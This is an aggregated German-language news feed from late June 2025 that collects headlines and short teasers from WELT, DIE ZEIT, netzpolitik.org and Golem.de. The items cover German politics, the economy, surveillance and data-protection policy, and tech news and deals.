Date of publish: Mon, 30 Jun 2025 12:47:37 GMT

Ballermann-Video von Gladbach-Star sorgt für Aufregung

Dieses Video dürfte Florian Neuhaus bereuen. Der Profi von Borussia Mönchengladbach spricht am Ballermann, offensichtlich nicht mehr ganz nüchtern, über sein Gehalt. Ob er auch derjenige ist, der über den Manager des Klubs herzieht, ist nicht ganz klar.

Article link

Date of publish: Mon, 30 Jun 2025 12:46:48 GMT

Inflationsrate sinkt im Juni überraschend auf zwei Prozent

Im April und Mai waren die Preise in Deutschland noch gestiegen – von Mai auf Juni hingegen stagnierten sie. Insgesamt lasse sich „feststellen, dass die Zeiten der Hochinflation zunächst vorbei sind“, heißt es von Expertenseite.

Article link

Date of publish: Mon, 30 Jun 2025 12:42:03 GMT

Wadephul verspricht in Kiew anhaltende Waffenhilfe

Außenminister Johann Wadephul ist zu seinem Antrittsbesuch in Kiew angekommen. Dort verspricht er anhaltende Waffenhilfe. WELT-Reporterin Tatjana Ohm berichtet aus der Ukraine. Man wolle vor allem der Ukraine helfen, eigene Waffen zu produzieren.

Article link

Date of publish: Mon, 30 Jun 2025 12:31:52 GMT

„Diese zehn Millionen Leute zu Nazis zu erklären, scheint mir unsinnig“

Andreas Rosenfelder spricht über das von der SPD angestrebte Verbotsverfahren gegen die AfD. Es sei eine „seltsame Utopie“ der politisch linken Parteien. Grund sei wohl auch ein Machtinteresse: „Ein AfD-Verbot würde bedeuten, dass es eine linke Mehrheit gibt.“

Article link

Date of publish: Mon, 30 Jun 2025 12:31:38 GMT

Warum das letzte Tabu der Asylpolitik jetzt fallen könnte – dank Dänemark

Der Kern der europäischen Migrationskrise ist eine weltweit einmalige Auslegung des Rechts auf Asyl. Sie wurzelt in der Europäischen Menschenrechtskonvention. Am Dienstag übernimmt Dänemark die EU-Ratspräsidentschaft – und will an ein Tabu rühren.

Article link

Date of publish: Mon, 30 Jun 2025 12:26:07 GMT

Nachrichten: DIE ZEIT Newsfeed

Nordrhein-Westfalen: 16-Jähriger stellt sich nach gewaltsamem Tod von Mutter und Kind

Nach dem Fund einer toten Frau und ihres Kindes in Dorsten gibt es einen Tatverdächtigen. Ein 16-Jähriger hat sich der Polizei gestellt.

Article link

Date of publish: Mon, 30 Jun 2025 14:29:50 -0000

Streit um Stromsteuer: SPD-Generalsekretär wirft Union Verhalten wie bei der Ampel vor

Die SPD sei bereit für eine allgemeine Senkung der Stromsteuer, sagte ihr Generalsekretär. Nur müsse die Union zur Finanzierung auch "Lieblingsprojekte neu priorisieren".

Article link

Date of publish: Mon, 30 Jun 2025 14:28:29 -0000

Tagebuch-Techniken: Wie Sie mit einem Tagebuch Ihr Leben verbessern

"Liebes Tagebuch, bringt das was?" Wie man ein Tagebuch so führt, dass es in jeder Lebenssituation hilft, erklärt der Optimierungspodcast.

Article link

Date of publish: Mon, 30 Jun 2025 14:22:26 -0000

Bundestag: Linke wirft Bundestagspräsidentin Klöckner fehlende Neutralität vor

Julia Klöckner treffe immer wieder politische Entscheidungen, kritisiert Ines Schwerdtner. Damit verletze die CDU-Politikerin ihre Neutralität.

Article link

Date of publish: Mon, 30 Jun 2025 14:20:25 -0000

Deutscher Gewerkschaftsbund: Langjähriger DGB-Chef Michael Sommer gestorben

Seine Amtszeit begann mit der Agenda 2010 und endete mit der Einführung des Mindestlohns. Nun ist der frühere DGB-Vorsitzende Michael Sommer mit 73 Jahren gestorben.

Article link

Date of publish: Mon, 30 Jun 2025 14:04:55 -0000

E-Scooter: Verkehrsminister Schnieder will wildes Parken von E-Scootern verbieten

Bisher werden sie oft auf Gehwegen geparkt, das Verkehrsministerium will jetzt neue Regeln für ausleihbare E-Scooter einführen. Die Betreiber kritisieren das deutlich.

Article link

Date of publish: Mon, 30 Jun 2025 13:37:22 -0000

Notlage in Gaza: Die ungeklärte Machtfrage

Israels Premier Netanjahu deutet ein Kriegsende in Gaza an. Doch die Situation an den Hilfsverteilzentren zeigt, was dem Gazastreifen trotz Waffenruhe drohen würde.

Article link

Date of publish: Mon, 30 Jun 2025 13:36:04 -0000

Musikfestival in Großbritannien: BBC entschuldigt sich für Glastonbury-Livestream von Bob Vylan

Die BBC bedauert, den Livestream des Punk-Rap-Duos Bob Vylan beim Glastonbury-Festival nicht unterbrochen zu haben. Er hatte Stimmung gegen die israelische Armee gemacht.

Article link

Date of publish: Mon, 30 Jun 2025 13:21:03 -0000

USA: Wo die Big Beautiful Bill Sozialkürzungen vorsieht

Die US-Regierung plant, ärmeren Haushalten den Zugang zur Krankenversicherung zu erschweren, um so Steuererleichterungen zu finanzieren. Ein Überblick zum Haushaltsgesetz

Article link

Date of publish: Mon, 30 Jun 2025 13:08:19 -0000

Konjunktur: Inflationsrate im Juni überraschend gesunken

Im vergangenen Monat hat die Inflationsrate überraschend nachgelassen. Während die Energiepreise sanken, war die Teuerung bei Dienstleistungen überdurchschnittlich stark.

Article link

Date of publish: Mon, 30 Jun 2025 12:59:42 -0000

"10 Jahre danach": Sie würde es wieder so machen

Zehn Jahre nach "Wir schaffen das" trifft sich Angela Merkel für ein WDR-Format mit Geflüchteten. Zu ihrem Vorgehen 2015 sagt sie: Eine andere Wahl gab es nicht.

Article link

Date of publish: Mon, 30 Jun 2025 12:21:48 -0000

Ukraine: Wadephul kündigt in Kyjiw engere Zusammenarbeit mit der Ukraine an

Bei seinem Antrittsbesuch in Kyjiw kündigte der Außenminister Joint Ventures in der Waffenproduktion an. Begleitet wird er von Vertretern der deutschen Rüstungsindustrie.

Article link

Date of publish: Mon, 30 Jun 2025 12:05:44 -0000

Peter Thiel: Wenn Milliardäre philosophisch werden

Feuilletonisten und politische Beobachter arbeiten sich an ihm ab: Peter Thiel. Denn er vereint alle politischen Widersprüche der heutigen Rechten in seiner Person.

Article link

Date of publish: Mon, 30 Jun 2025 11:58:13 -0000

Fußball-EM der Frauen 2025: Spaniens Weltmeisterinnen sind Favorit – DFB-Frauen dürfen hoffen

Sechzehn Teams spielen bei der Fußball-EM der Frauen um den Titel. Erstmals wird das Turnier in der Schweiz ausgetragen. Antworten auf die wichtigsten Fragen

Article link

Date of publish: Mon, 30 Jun 2025 11:07:22 -0000

Hitzewelle in Westeuropa: Niedrige Pegelstände am Rhein beeinflussen Frachtverkehr

Wegen der anhaltenden Hitze sinken die Pegelstände des Rheins. Schiffe können nicht mehr voll beladen werden. Fast in ganz Frankreich gelten Hitzewarnungen.

Article link

Date of publish: Mon, 30 Jun 2025 11:04:03 -0000

netzpolitik.org

KW 26: Die Woche, in der wir uns wegen Stigmatisierung gesorgt haben

Fraktal, das ein bisschen wie ein Seestern aussieht.
– Fraktal, generiert mit MandelBrowser von Tomasz Śmigielski
Die 26. Kalenderwoche geht zu Ende. Wir haben 13 neue Texte mit insgesamt 91.307 Zeichen veröffentlicht. Willkommen zum netzpolitischen Wochenrückblick.

Article link

Date of publish: Sat, 28 Jun 2025 08:49:44 +0000

Bremse oder Motor: EU-Kommission stellt Netzneutralität zur Debatte

Telekom-Chef Timotheus Höttges, Vorstandsvorsitzender der Deutschen Telekom, mit einem historischen Mobiltelefon Pocky vor den Aktionären.
Manche Netzbetreiber stellen Netzneutralität als Innovationsbremse dar und wollen sie aufweichen. (Symbolbild: Telekom-Chef Timotheus Höttges mit dem historischen Mobiltelefon Pocky.) – Alle Rechte vorbehalten IMAGO / Panama Pictures
Noch in diesem Jahr will die EU-Kommission die Regeln für die europäischen Telekommunikationsmärkte weitflächig überarbeiten. Mit dem Digital Networks Act steht plötzlich auch die Netzneutralität zur Debatte – und niemand kann beantworten, warum genau. Eine Spurensuche.

Article link

Date of publish: Fri, 27 Jun 2025 11:59:03 +0000

Trotz Fristverlängerung: Schwarz-Rot peitscht Änderung des BKA-Gesetzes durch den Bundestag

Holger Muench und Alexander Dobrindt bei der Bundespressekonferenz
Die Chefs von BKA und Innenministerium bei einer Pressekonferenz (Archivbild) – Alle Rechte vorbehalten IMAGO / IPON
Das BKA-Gesetz war teilweise verfassungswidrig. Zu unklar waren die Regeln, wann Beschuldigte in Polizeidatenbanken gespeichert werden dürfen. Zu weit waren die Befugnisse, um mögliche Kontaktpersonen von Terrorverdächtigen zu überwachen. Doch die Neuregelung, die der Bundestag gestern verabschiedete, kann Fachleute nicht überzeugen.

Article link

Date of publish: Fri, 27 Jun 2025 09:01:24 +0000

Datenschutzbehörde greift ein: DeepSeek fliegt aus den App Stores

Smartphone mit geöffnetem Apple-App-Store auf dem Screen
Raus aus den App-Stores, aber weiter verfügbar: KI-Chatbot DeepSeek – Alle Rechte vorbehalten IMAGO / Rüdiger Wölk
Der chinesische KI-Chatbot DeepSeek übermittelt Nutzer*innendaten nach China. Die Berliner Datenschutzbehörde geht jetzt gegen den Anbieter vor. Apple und Google sollen DeepSeek aus ihren Stores entfernen.

Article link

Date of publish: Fri, 27 Jun 2025 08:05:45 +0000

30 Jahre online: Wie das Internet den Journalismus verändert hat

Ein altmodischer Maus-Cursor vor schwarzem Hintergrund
Klicks wurden zur wichtigsten Währung im Online-Journalismus – Gemeinfrei-ähnlich freigegeben durch unsplash.com Liam Briese
Von Suchmaschinen über soziale Medien bis zu KI: Technische Entwicklungen haben den Journalismus im Netz immer wieder verändert und ihm Reichweite als zentrale Zielgröße aufgezwungen. Die Geschichte der Online-Medien muss deshalb auch als Geschichte vom Verlust der journalistischen Autonomie begriffen werden.

Article link

Date of publish: Thu, 26 Jun 2025 16:06:12 +0000

„Going Dark“: EU-Kommission stellt Fahrplan für Datenzugang für Polizeien vor

Ein Mensch mit Laptop, im Hintergrund ein Rechenzentrum.
Polizeien soll der Zugang zu Daten vereinfacht werden, wünscht sich die EU-Kommission. (Symbolbild) – Alle Rechte vorbehalten IMAGO / Pond5 Images
Viele EU-Länder wollen der Polizei mehr Zugang zu privaten Daten verschaffen. Neben der Vorratsdatenspeicherung steht auch der Zugriff auf verschlüsselte Inhalte zur Debatte. In einem Fahrplan skizziert die EU-Kommission ihre nächsten Schritte.

Article link

Date of publish: Wed, 25 Jun 2025 11:38:07 +0000

Bestandsdatenauskunft 2024: Behörden fragen weiter jede Sekunde, wem eine Telefonnummer gehört

Gelbe Teleefonzelle
Wem gehört dieser Telefonanschluss? (Symbolbild) CC-BY-SA 4.0 Andreas Axel Kirch / Wikimedia Commons
Staatliche Stellen haben letztes Jahr fast 27 Millionen Mal abgefragt, wem eine Telefonnummer gehört. Das ist ein neuer Rekordwert. Auch Inhaber von IP-Adressen werden abgefragt, laut Telekom vor allem wegen Urheberrechtsverletzungen.

Article link

Date of publish: Wed, 25 Jun 2025 10:00:49 +0000

Zollkrieg mit den USA: Trump will EU-Digitalgesetze aufweichen

Abstürzende Aktuenkurse auf einem Smartphone-Display.
Der weiterhin ungeklärte Zollstreit zwischen den USA und der EU sorgt weiterhin für Unruhe. – Alle Rechte vorbehalten IMAGO / MiS
Die EU-Kommission könnte einem Medienbericht zufolge die Durchsetzung europäischer Digitalgesetze vorerst aussetzen, um Donald Trump im Handelskrieg zu besänftigen. Das stößt im EU-Parlament auf starken Widerstand.

Article link

Date of publish: Tue, 24 Jun 2025 13:27:04 +0000

Repression gegen Budapest Pride: EU soll gegen digitale Verfolgung und Diskriminierung einschreiten

Menschen marschieren mit Regenbogen-Flagge
Demonstration gegen das Gesetzespaket, das Pride-Veranstaltungen in Ungarn verbietet. – Alle Rechte vorbehalten IMAGO
Bei der Budapest Pride am Samstag drohen den Teilnehmenden Strafen, die Polizei darf sogar Gesichtserkennung zur Identifikation einsetzen. Etwa 50 Menschenrechtsorganisationen fordern die EU-Kommission zu sofortigen Handeln gegen den "gefährlichen Präzedenzfall" auf.

Article link

Date of publish: Tue, 24 Jun 2025 11:48:33 +0000

EU-Ratspräsidentschaft: Dänemark setzt Chatkontrolle wieder auf die Agenda

Mette Frederiksen steht während einer Pressekonferenz an einem Rednerpult vor der Fahne der EU, Dänemarks und Deutschlands.
Unter Mette Frederiksen übernimmt Dänemark ab Juli die EU-Ratspräsidentschaft. (Symbolbild) – Alle Rechte vorbehalten IMAGO / Christian Spicker
Chatkontrolle, mehr Daten für die Polizei, KI-freundliches Urheberrecht, eine Überarbeitung des Datenschutzes: Das wünscht sich die ab 1. Juli amtierende dänische Ratspräsidentschaft für die Digitalpolitik der EU. Nutzer*innen- und Freiheitsrechte finden – wenn überhaupt – nur als Randnotiz statt.

Article link

Date of publish: Tue, 24 Jun 2025 07:16:21 +0000

Automatisierte Datenanalyse: Sachsen-Anhalt will „interimsweise“ Palantir

Tamara Zieschang spricht im Landtag von Sachsen-Anhalt.
Landesinnenministerin Tamara Zieschang (CDU) im Mai 2025 im Landtag von Sachsen-Anhalt.
Die Polizei Sachsen-Anhalts soll künftig automatisierte Datenanalysen mit Massendaten von Unbescholtenen durchführen dürfen. Ein Gesetz ist schon auf dem Weg. Abgeordnete der Opposition gehen nach einer Antwort der Landesregierung davon aus, dass Software von Palantir eingesetzt werden wird. Denn der Innenministerin steht gar nichts anderes zeitnah zur Verfügung.

Article link

Date of publish: Mon, 23 Jun 2025 14:49:15 +0000

Anti-Autokratie-Handbuch: 26 Werkzeuge zur Verteidigung der Demokratie

Illustration im Bauhaus-Stil. Personen lesen ein Handbuch; im Hintergrund Werkzeuge.
Werkzeuge (Symbolbild) – Public Domain DALL-E-3 („men and women reading a book, holding tools like a screwdriver and a folding rule behind their backs, bauhaus style reduced minimalist geometric shape“)
In einem Handbuch geben Wissenschaftler*innen aus den USA und Europa Ratschläge, wie sich Menschen im akademischen Betrieb gegen aufkeimenden Autoritarismus stemmen können – abgestuft nach Risiko-Level. Das ist nicht nur für Forschende lesenswert.

Article link

Date of publish: Mon, 23 Jun 2025 14:12:20 +0000

Videoüberwachung und Staatstrojaner: Berliner Landesregierung will Befugnisse der Polizei ausweiten

Polizisten mit Helmen, in denen sich Blaulicht spiegelt.
Polizisten beim 1. Mai in Berlin. – Alle Rechte vorbehalten IMAGO / A. Friedrichs
Die schwarz-rote Koalition im Land Berlin setzt ihre "Law & Order"-Politik weiter fort. Nun sollen Videoüberwachung und der Einsatz von Staatstrojanern bei der Polizei ausgeweitet werden.

Article link

Date of publish: Mon, 23 Jun 2025 13:00:50 +0000

Datenaustausch zwischen Behörden: Innenminister setzen Vertrauen bei der Behandlung psychischer Erkrankungen aufs Spiel

Bild eines Gehirns wie durch eine Mosaik-Scheibe betrachtet.
Das Vertrauen durch die Schweigepflicht ist wichtig, damit psychisch erkrankte Personen sich Hilfe suchen können. – Gemeinfrei-ähnlich freigegeben durch unsplash.com Shubham Dhage
Die Innen- und Gesundheitsminister:innen haben auf ihren letzten Konferenzen über den Umgang mit psychisch erkrankten Personen beraten. Doch Ideen wie ein „integriertes Risikomanagement“ oder Datenaustausch zwischen Gesundheitsbehörden und Polizeien treiben Stigmatisierung voran und behindern angemessene Hilfe.

Article link

Date of publish: Mon, 23 Jun 2025 11:25:58 +0000

KW 25: Die Woche, als wir zwei Datenschutz-Erfolge verbuchten

– Fraktal, generiert mit MandelBrowser von Tomasz Śmigielski
Die 25. Kalenderwoche geht zu Ende. Wir haben 18 neue Texte mit insgesamt 129.462 Zeichen veröffentlicht. Willkommen zum netzpolitischen Wochenrückblick.

Article link

Date of publish: Sat, 21 Jun 2025 06:01:48 +0000

Repaircafés: Das ist doch noch gut!

Zwei Männer beugen sich über ein technisches Gerät.
Bernd und Olaf sinnieren über die Reparatur eines Geräts zur Kniemobilisierung. – Alle Rechte vorbehalten netzpolitik.org
In Repaircafés reparieren Ehrenamtliche defekte Dinge. Sie basteln damit an einer Alternative zur Wegwerfgesellschaft. Aber Repaircafés sind auch soziale Treffpunkte. Ein Besuch zeigt, wie der Wunsch, Müll zu vermeiden, Menschen zusammenführen kann.

Article link

Date of publish: Sat, 21 Jun 2025 06:00:09 +0000

Databroker Files: Wetter Online lässt Daten tröpfeln

Ein Smartphone mit Wetter-Online-App. Aus dem Gerät kommt ein Wasserhahn. Aus dem Wasserhahn tröpfeln GPS-Daten.
Getropft (Symbolbild) – Smartphone: Pixabay; Nebel: Vecteezy; Screenshot: Wetter Online; Montage: netzpolitik.org
Wir haben Post von Wetter Online: endlich. Nach einer Beschwerde und vielen Monaten Verzögerung soll nun eine Tabelle Auskunft darüber geben, welche Standortdaten zu einem Redakteur aus dem Recherche-Team vorliegen. Doch das Dokument lässt Fragen offen.

Article link

Date of publish: Fri, 20 Jun 2025 09:56:25 +0000

Moderation gone wild: Instagram sperrt Accounts politischer Organisationen

Eine Tastatur ist eine Kette eingewickelt, die von einem Vorhängeschloss zusammengehalten wird.
Meta sperrt immer wieder politische Organisationen aus ihren Instagram-Accounts aus. – Alle Rechte vorbehalten IMAGO/Wolfilser
Zahlreiche Kreisverbände der Grünen Jugend, der Linken sowie die Partei der Humanisten haben den Zugang zu ihren Instagram-Accounts verloren. Die Betroffenen können sich nicht erklären, warum. Der Versuch der Aufklärung ist eine kafkaeske Mission.

Article link

Date of publish: Fri, 20 Jun 2025 05:54:44 +0000

Klarnamenpflicht: Wir alle brauchen anonyme Orte im Netz

Personen mit Masken
Pseudonymität hat viele Gesichter – und Gründe. – Gemeinfrei-ähnlich freigegeben durch unsplash.com Wazaer Shadman / Sara Ghasemi / Thiago Rebouças /
Die Forderung nach einer Klarnamenpflicht im Netz hat wieder Konjunktur. Dabei ist sie brandgefährlich für gleich mehrere Grundrechte. In einer Demokratie brauchen wir Orte, an denen wir wirklich frei kommunizieren können. Ein Kommentar.

Article link

Date of publish: Thu, 19 Jun 2025 16:11:05 +0000

Open Internet Stack: The EU Commission’s vague plans for open source

A blurry mess of lights.
The Commission’s plans are not really clear. – Public Domain Pexels / Rô Acunha
An internal paper gives some clues about the EU Commission's plans for open source policy in the future. An existing funding programme will continue under a new name and re-focus on commercial value. The document calls on the Commission to support open source in public administrations – and think about a new legal form. Many questions remain open.

Article link

Date of publish: Thu, 19 Jun 2025 14:31:40 +0000

Open Internet Stack: Die vagen Open-Source-Pläne der EU-Kommission

Eine unklare Menge an Lichtern
Die Pläne der Kommission sind nicht wirklich klar. – Public Domain Pexels / Rô Acunha
Ein internes Papier gibt Hinweise auf die EU-Politik für Open Source in den kommenden Jahren. Ein schon etabliertes Förderprogramm soll unter einem neuen Namen weiterlaufen, mit Fokus auf Kommerzialisierung. Die Kommission soll sich auch für mehr Open Source in der Verwaltung einsetzen – und über eine eigene Rechtsform nachdenken. Viele Fragen bleiben offen.

Article link

Date of publish: Thu, 19 Jun 2025 14:31:36 +0000

Berliner Datenschutzbehörde prüft: Immobilienplattform trainierte heimlich KI-Modell mit Kundenmails

Hausfassade von unten
Für effizientere Antworten: Anfragen an ImmoScout werden zu KI-Trainingsmaterial. – Gemeinfrei-ähnlich freigegeben durch unsplash.com Brandon Griggs / Unslash
Eine Berliner Immobilienplattform hat mit Nachrichten ihrer Kund*innen ein KI-Modell trainiert – ohne das offenzulegen. Die Berliner Datenschutzbehörde prüft den Fall. Der Marktführer ImmoScout24 setzt seit längerem auf KI und hat inzwischen seine Datenschutzerklärung angepasst.

Article link

Date of publish: Thu, 19 Jun 2025 12:16:15 +0000

Staatstrojaner und Registrierungspflicht: Was die Regierung in Österreich plant

Aussenministerin Beate Meinl-Reisinger NEOS , Bundeskanzler Christian Stocker ÖVP und Vizekanzler Andreas Babler SPÖ beim Pressefoyer nach dem Minsterrat im Parlament.
Die österreichische Regierung will im Netz durchgreifen (von links nach rechts): Außenministerin Beate Meinl-Reisinger (NEOS) , Bundeskanzler Christian Stocker (ÖVP) und Vizekanzler Andreas Babler (SPÖ) beim Pressefoyer nach dem Minsterrat. – Alle Rechte vorbehalten IMAGO / photonews.at
Nach dem Amoklauf in Graz hat die österreichische Regierung sich auf einen Gesetzentwurf für Staatstrojaner geeinigt. Außerdem steht eine Registrierungspflicht für soziale Medien im Raum. Bürgerrechtsorganisationen fürchten, dass Grundrechte verletzt werden.

Article link

Date of publish: Thu, 19 Jun 2025 10:14:53 +0000

CSAM: Ministerien verrühren „Löschen statt Sperren“ mit Vorratsdatenspeicherung

Tastatur mit einer großen X-taste
Löschen statt Sperren (Symbolbild) – Gemeinfrei-ähnlich freigegeben durch unsplash.com Sam Pak
Pädokriminelle Inhalte werden weiterhin schnell von Servern gelöscht, wenn denn die Polizei diese bei den Providern meldet. Doch statt sich eingehender mit dieser Erfolgsstatistik zu befassen, fordern die zuständigen Ministerien, mehr anlasslose Massenüberwachung einzuführen.

Article link

Date of publish: Thu, 19 Jun 2025 09:05:13 +0000

Digitale Dekade: EU-Kommission kritisiert schleppende Digitalisierung

Glasfaserkabel in einem aufgebaggertem Loch mit Baustellenabsperrung.
Ewige Baustelle Glasfaser? (Symbolbild) – Alle Rechte vorbehalten IMAGO / Rene Traut
Am Ende des Jahrzehnts sollen EU-weit Glasfasern verlegt und viele Behördengänge digital möglich sein. In Deutschland geht es der EU-Kommission nicht schnell genug. Der diesjährige Zwischenbericht zur "Digitalen Dekade" zeigt auf, wie wir hierzulande noch immer hinterherhinken.

Article link

Date of publish: Wed, 18 Jun 2025 14:09:32 +0000

Golem.de

Anzeige: Apple iPhone 16e zum neuen Tiefpreis bei Amazon

Der Prime Day wirft seine Schatten voraus. Schon vor Beginn des viertägigen Sales-Events sind Produkte wie das iPhone 16e deutlich reduziert. (iPhone 16, iPhone)

Article link

Date of publish: Mon, 30 Jun 2025 16:28:02 +0200

Mit AST Spacemobile: Vodafone startet Satellitenunternehmen Satco in Luxemburg

Satco bietet Direct-to-Device-Dienst für Europa. Vodafone und AST Spacemobile wollen dafür Frequenzen von der Konkurrenz, die auch Starlink haben will. (Vodafone, Mobilfunk)

Article link

Date of publish: Mon, 30 Jun 2025 15:49:02 +0200

Anzeige: Endoskopkamera mit Licht bei Amazon für nur 17,80 Euro

Amazon hat eine Endoskopkamera mit Licht im Angebot, mit der man schwer erreichbare Stellen per Smartphone inspizieren kann. (Technik/Hardware)

Article link

Date of publish: Mon, 30 Jun 2025 15:25:02 +0200

Architektur: China verlegt ganzen Stadtblock - dank Robotertechnik

432 kleine Roboter kamen zum Einsatz, um einen gesamten Wohnblock in China zu bewegen. Der Transport dauerte knapp drei Wochen. (Roboter, KI)

Article link

Date of publish: Mon, 30 Jun 2025 15:00:02 +0200

Bundesverkehrsministerium: Parkverbot für E-Scooter auf Gehwegen geplant

Das Bundesverkehrsministerium arbeitet an neuen Bestimmungen für das Parken von Leih-E-Scootern und Fahrrädern im öffentlichen Raum. (E-Scooter, Parken)

Article link

Date of publish: Mon, 30 Jun 2025 14:45:02 +0200

Marketing: Werbung mit KI im Text schreckt Kunden ab

Wer mit künstlicher Intelligenz wirbt, verkauft schlechter: Forscher belegen, dass die Erwähnung abschreckt - besonders bei teuren Produkten. (KI, Onlinewerbung)

Article link

Date of publish: Mon, 30 Jun 2025 14:30:02 +0200

Methanemission: Das turkmenische Tor zur Hölle schließt sich

1971 ist es zu Gasausströmungen bei einem Bohrunfall in Turkmenistan gekommen. Eine Fehlentscheidung führte zu einem endlosen Feuer, das langsam eingedämmt wird. (Klima & Umwelt, Energiewende)

Article link

Date of publish: Mon, 30 Jun 2025 14:15:01 +0200

Handyverbot für Kinder und Jugendliche: Philosoph Sloterdijk vergleicht Smartphones mit Drogen

In der Debatte um Smartphone-Verbote schaltet sich der Philosoph Peter Sloterdijk ein. Er kritisiert Eltern, die sich "wie Drogendealer" verhalten. (Bildung, Smartphone)

Article link

Date of publish: Mon, 30 Jun 2025 14:00:01 +0200

Elektroauto: Verbraucherschutzzentrale mahnt Preise an Ladesäulen an

Wer an öffentlichen Ladesäulen sein Elektroauto auflädt, zahlt deutlich mehr als über eine Wallbox zu Hause. Der vzbv will, dass sich das ändert. (Ladesäule, Elektroauto)

Article link

Date of publish: Mon, 30 Jun 2025 13:45:01 +0200

(g+) Maven Enforcer-Plugin: Die liebevolle eiserne Faust von Maven

Maven hat sich zur Automatisierung des Build-Prozesses in vielen Projekten etabliert. Mit dem Enforcer-Plugin lassen sich dafür strikte Regeln definieren. Eine Anleitung von Marco Dahms (Tools, Node.js)

Article link

Date of publish: Mon, 30 Jun 2025 13:30:01 +0200

Anzeige: Laptop-Powerbank von Anker jetzt für unter 75 Euro sichern

Diese Powerbank von Anker mit 25.000 mAh ist interessant für alle, die auch unterwegs nicht auf eine Steckdose angewiesen sein wollen. (Technik/Hardware, Notebook)

Article link

Date of publish: Mon, 30 Jun 2025 13:21:01 +0200

Nach Entlassung: Wütender Ex-Mitarbeiter sperrt Kunden aus IT-Systemen aus

Ein entlassener IT-Mitarbeiter wollte es seinem Ex-Arbeitgeber heimzahlen. Durch einen gezielten Angriff richtete er Schäden von über 200.000 Euro an. (Security, Server)

Article link

Date of publish: Mon, 30 Jun 2025 13:10:01 +0200

Die meisten Kunden schreien: Callcenter-Angestellte wehren sich gegen KI-Vorwurf

Anrufer verlangen von Callcenter-Agenten immer häufiger, dass sie mit einem echten Menschen sprechen möchten. Diese behelfen sich mit Tricks. (Arbeit, KI)

Article link

Date of publish: Mon, 30 Jun 2025 12:55:02 +0200

Science-Fiction: Hollywoodfilm des Animes Akira ist gescheitert

Rund zwei Jahrzehnte lang hat Warner versucht, einen Realfilm zum Anime Akira zu produzieren. Nun gehen die Rechte zurück an den Publisher. (Science-Fiction, Film)

Article link

Date of publish: Mon, 30 Jun 2025 12:34:01 +0200

Vergleich zu Windows 10: "Windows-11-PCs sind bis zu 2,3-mal schneller"

Microsoft mogelt sich in Tests diverse Vorteile von Windows 11 gegenüber Windows 10 zusammen. Hier ist offenbar nicht fair getestet worden. (Windows 11, Windows)

Article link

Date of publish: Mon, 30 Jun 2025 12:14:01 +0200

Sonnensystem: Möglicherweise Hunderte Asteroiden in der Venus-Umlaufbahn

Die meisten Venus-Co-Orbital-Asteroiden sind von der Erde aus nur schwer zu entdecken - und laut einer Studie vielleicht zahlreicher als gedacht. (Asteroid, Wissenschaft)

Article link

Date of publish: Mon, 30 Jun 2025 12:10:01 +0200

Anzeige: Tablet mit 10,1 Zoll, SIM und Android 15 zum Tiefpreis

Amazon hat ein Tablet mit 10,1 Zoll HD+ im Angebot, das mit Dual-SIM, Android 15 und 24 GByte RAM vielseitige Einsatzmöglichkeiten bietet. (Tablet, Mobil)

Article link

Date of publish: Mon, 30 Jun 2025 12:04:01 +0200

40 Jahre FPGA: Eine Liebeserklärung an den tollsten Chip der Welt

FPGAs sind noch immer ein Nischenprodukt. Dabei lassen sich damit Dinge umsetzen, die mit Mikrocontrollern und klassischen PCs unmöglich sind. Von Johannes Hiltscher (FPGA, DIY - Do it yourself)

Article link

Date of publish: Mon, 30 Jun 2025 12:01:01 +0200

Forschungsleiter schlägt Alarm: OpenAI-Forscher wechseln zu Meta

Nachdem Meta vier KI-Experten von OpenAI abwerben konnte, sieht man sich dort einem Kampf um Forschungstalente ausgesetzt. (OpenAI, KI)

Article link

Date of publish: Mon, 30 Jun 2025 11:54:01 +0200

Cloudflare und mehr: Russland sperrt westliche Clouddienste fast vollständig aus

Wer von Russland aus auf Dienste von Cloudflare, Hetzner oder OVH zugreifen will, kommt nicht mehr weit. Putin greift zu drastischen Sperrmaßnahmen. (Russland, Zensur)

Article link

Date of publish: Mon, 30 Jun 2025 11:37:02 +0200

Radio Module 2: Das Raspberry Pi Funkmodul RM2 ist da

WLAN und Bluetooth für eigene Projekte mit RP2-Mikrocontroller: Das RM2 macht das mit wenig Aufwand möglich, kostet aber etwas mehr als die Konkurrenz. (Raspberry Pi, WLAN)

Article link

Date of publish: Mon, 30 Jun 2025 11:22:14 +0200

Imsi-Catcher: Android 16 soll vor Fake-Mobilfunkstationen warnen

Android 16 hat eine Funktion, um Nutzer vor Imsi-Catchern zu warnen, über die Telefonate abgehört und Standorte bestimmt werden können. (Security, Android)

Article link

Date of publish: Mon, 30 Jun 2025 11:07:02 +0200

Remedy Entertainment: Firebreak zwischen Millionenerfolg und 1.992 Steam-Spielern

Ein Flop wie Concorde von Sony - oder doch ein großer Erfolg? FBC Firebreak von Remedy Entertainment hatte zuletzt auf Steam nur 154 Spieler. (Remedy Entertainment, Spiele)

Article link

Date of publish: Mon, 30 Jun 2025 10:37:02 +0200

Gegen Prokrastination: Chrome-Extension lässt sich für Website-Zugriff anschreien

Wer mit Scream to Unlock auf Dienste wie Facebook zugreifen will, muss sich lauthals als Verlierer outen. Je lauter der Schrei, desto länger darf man surfen. (Tools, Browser)

Article link

Date of publish: Mon, 30 Jun 2025 10:10:02 +0200

Vision Pro: Apple soll an sieben Headsets und Brillen arbeiten

Das Thema Headset scheint trotz des mäßigen Erfolgs des Vision Pro bei Apple noch lange nicht durch zu sein. (Apple, Headset)

Article link

Date of publish: Mon, 30 Jun 2025 09:53:01 +0200

Windows 11 25H2: Nächster Windows-11-Patch soll nur einen Neustart brauchen

Kunden merken teilweise nicht einmal, dass ihre Geräte schon für das kommende Windows 11 25H2 vorbereitet werden. (Windows 11, Microsoft)

Article link

Date of publish: Mon, 30 Jun 2025 09:29:02 +0200

Quishing: Polizei warnt vor gefälschten QR-Codes an Parkautomaten

Wer QR-Codes an Parkautomaten scannt, sollte genau hinsehen, ob diese überklebt sind. Betrüger leiten auf Phishingseiten um und stehlen Geld. (Phishing, Security)

Article link

Date of publish: Mon, 30 Jun 2025 08:53:02 +0200

Ausfallsicherheit des Internet: Kommunikation in Gefahr

Unbegrenzt und ständig kommunizieren - dafür steht für das Internet. Wie sehr ist unsere Freiheit im Netz bedroht? Ein IMHO von Jochen Demmer (Infrastruktur, IMHO)

Article link

Date of publish: Mon, 30 Jun 2025 08:29:02 +0200

Anzeige: Philips Ventilator für unter 50 Euro im Angebot

Der Philips Tischventilator der Serie 3000 ist bei Amazon nur für kurze Zeit mit 35 Prozent für unter 50 Euro im Angebot erhältlich. (Technik/Hardware, Philips)

Article link

